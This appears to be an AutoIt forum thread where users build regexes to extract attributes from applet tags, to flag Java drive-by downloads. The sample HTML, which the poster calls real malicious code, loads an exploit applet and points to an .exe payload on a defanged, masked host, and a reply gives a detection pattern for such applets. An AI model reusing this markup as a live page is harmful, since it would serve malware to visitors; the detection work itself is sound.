Jump to content
Sign in to follow this  
DeltaRocked

Regex for applet

Recommended Posts

hello,

I need help in generating a single regex for the following.

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

Presently using 4 different regex's for the above mentioned string starting with applet archive: I need to retrive the url, code, width and height.

Secondly, there can be multiple applets, hence I am extracting the text from <applet to /applet> and then executing four regex statements.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)

Share this post


Link to post
Share on other sites

Are the parameters all the time the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(d+)".*height="(d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

deltarocked,

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: figured out that the problem is the space delimiting the pattern but do NOT know how to NOT return the space as a match

Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Share this post


Link to post
Share on other sites

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).
kylomas

In this case the 'or' | is not appropriate. You should use wildcards between the parts to be captured.

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to build bigger and better idiots. So far, the universe is winning."- Rick Cook

Share this post


Link to post
Share on other sites

Apologies to deltrocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly, however, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how to include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")
Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Share this post


Link to post
Share on other sites

Don't miss a question mark in case it's needed either. It isn't the actual case here but that is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other terms, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? qualifier (which is nor the same as the ? "optional" modifier which is a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurence of code=.

Else you find yourself in situation 1 above (too greedy). This in fact may happen since line breaks between html markup are completely unimportant and there may be none or many.


This wonderful site allows debugging and testing regular expressions (many flavors available). An absolute must have in your bookmarks.
Another excellent RegExp tutorial. Don't forget downloading your copy of up-to-date pcretest.exe and pcregrep.exe here
RegExp tutorial: enough to get started
PCRE v8.33 regexp documentation latest available release and currently implemented in AutoIt beta.

SQLitespeed is another feature-rich premier SQLite manager (includes import/export). Well worth a try.
SQLite Expert (freeware Personal Edition or payware Pro version) is a very useful SQLite database manager.
An excellent eBook covering almost every aspect of SQLite3: a must-read for anyone doing serious work.
SQL tutorial (covers "generic" SQL, but most of it applies to SQLite as well)
A work-in-progress SQLite3 tutorial. Don't miss other LxyzTHW pages!
SQLite official website with full documentation (may be newer than the SQLite library that comes standard with AutoIt)

Share this post


Link to post
Share on other sites

hello everybody,

a little bit of history about this snippet . This snippet is an actual working DriveBy Download html code. and all driveby downloads which are based on Java have the same syntax but nothing can be said about their positions or the "Line Feed" or the Spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These 3 parameters are a gievaway that this is a malacious code

Logical reasoning: Width and Height cannot be 1 or less than 50 unless the intent is malicious. These dimensions are viewed by a user

ScriptEngineExp.class is a java class which executes commands. :)

The individual regex's which I have written essentially cover all the tricks used by hackers to ensure that it returns on exact value , irrespective of the " or ' or no quotes , cuase anything can be used in HTML and still it is parsed.

Thanks again for the efforts and the discussion.

Regards

Deltarocked

Edited by deltarocked

Share this post


Link to post
Share on other sites

Try this one

(?i)code=[x22x27]?script.+?.class[x22x27]?s*width=[x22x27]?d[x22x27]?s*height=[x22x27]?d[x22x27]?

I could probably shorten it down but it should work as is.


George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

"Old age and treachery will always overcome youth and skill!"

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

  • Similar Content

    • By genius257
      Inspired by PHP's preg_split.
      Split string by a regular expression.
      Also supports the same flags as the PHP equivalent.
      v1.0.1
       
      Example:
      #include "StringRegExpSplit.au3" StringRegExpSplit('splitCamelCaseWords', '(?<=\w)(?=[A-Z])') ; ['split', 'Camel', 'Case', 'Words']  
    • By BlueBandana
      Is there a way to output the regex matches into a file?
      I have a script to compare two files and check for regex matches.
      I want to output the matching regex of 'testexample.txt' to another file.
      #include <MsgBoxConstants.au3> #include <Array.au3> $Read = FileReadToArray("C:\Users\admin\Documents\testexample.txt") $Dictionary = FileReadToArray("C:\Users\admin\Documents\example.txt") For $p = 0 To UBound($Dictionary) - 1 Step 1 $pattern = $Dictionary[$p] For $i = 0 To UBound($Read) - 1 Step 1 $regex = $Read[$i] If StringRegExp($regex, $pattern, 0) Then MsgBox(0, "ResultsPass", "The string is in the file, highlighted strings: " ) Else MsgBox(0, "ResultsFail", "The string isn't in the file.") EndIf Next Next  
    • By guner7
      Hello,
      I need some help to parse the Green highlighted value with from below text:
      RESISTOR  THICK FILM 4.64K ±1% 1/4W ±100PPM/°C 1206 SMT
      RESISTOR  THICK FILM 3.83K ±1% 1/4W ±100PPM/°C 1206 SMT
      RESISTOR CARBON FILM 22K ±10% 1/2W AXIAL THT
      RESISTOR  WIREWOUND  22 ±5% 3W ±30PPM/°C AXIAL THT
      RESISTOR  METAL OXIDE 4.7K ±5% 2 W ±300PPM/°C AXIAL THT
      RESISTOR  THICK FILM 0   1/8W  0805 SMT
      I am using positive look behind.:
      (?<=FILM|WOUND|OXIDE).+ Can only pull this off:
      4.64K ±1% 1/4W ±100PPM/°C 1206 SMT 3.83K ±1% 1/4W ±100PPM/°C 1206 SMT 22K ±10% 1/2W AXIAL THT  22 ±5% 3W ±30PPM/°C AXIAL THT 4.7K ±5% 2 W ±300PPM/°C AXIAL THT 0   1/8W  0805 SMT I'm trying the \b word boundary to no avail at this point. Appreciate if anyone would guide me on this?
    • By junichironakashima
      Im creating a code that will work in this sequence:
      1. Copy the text (question) in one atea of the screen
      2. Catch the 2 strings (number)
      3. Multiply the 2 strings ( $1*$2)
      4. Click the next area to put the answer
      5. Paste the answer
       
      This is my code
       
      MouseClick($MOUSE_CLICK_LEFT, 479, 802, 3, 1) ;Clicking all of the text
      Send("^c") 
      $x = StringRegExpReplace(ClipGet(), 'What is (\d*) x (\d*) \?$', "$1*$2")
      MouseClick($MOUSE_CLICK_LEFT, 480, 844, 1, 1)
      ClipPut($x)
      Send("^v")
       
      However the output is this
      $1*$2
       
      How can I make it solve itself? Because I tried this code:
      MouseClick($MOUSE_CLICK_LEFT, 479, 802, 3, 1) ;Clicking all of the text
      Send("^c")
      MouseClick($MOUSE_CLICK_LEFT, 480, 844, 1, 1) $x = Execute(StringRegExpReplace(ClipGet(), 'What is (\d*) x (\d*) \?$', "$1*$2"))
      ClipPut($x)
      Send("^v")
      Output is just blank text

    • By gruntydatsun
      I have an XML file and every time there are three lines in a row with only <null/> in them, i want to insert a fourth line with <null/>.   Each line starts with 3 white spaces, followed by <null/> and ends with a white space followed by CR LF.   The presence of the three lines as described is unique to the points where I want to insert a line in this document.
       I'm trying to figure out how to apply the repeating part of a regex  {1,4} but apply it to this whole segment. 
      So far I have the below which picks up an individual line ok:
      ^\s{3}<null/>\s\r\n I tried wrapping it all in braces () then adding {3} but I'm obviously getting something wrong. 
      Attached is a section from the xml file with a block of nulls that should be matched if anyone would like to have a look.
      Help_From_Forum.xml
×
×
  • Create New...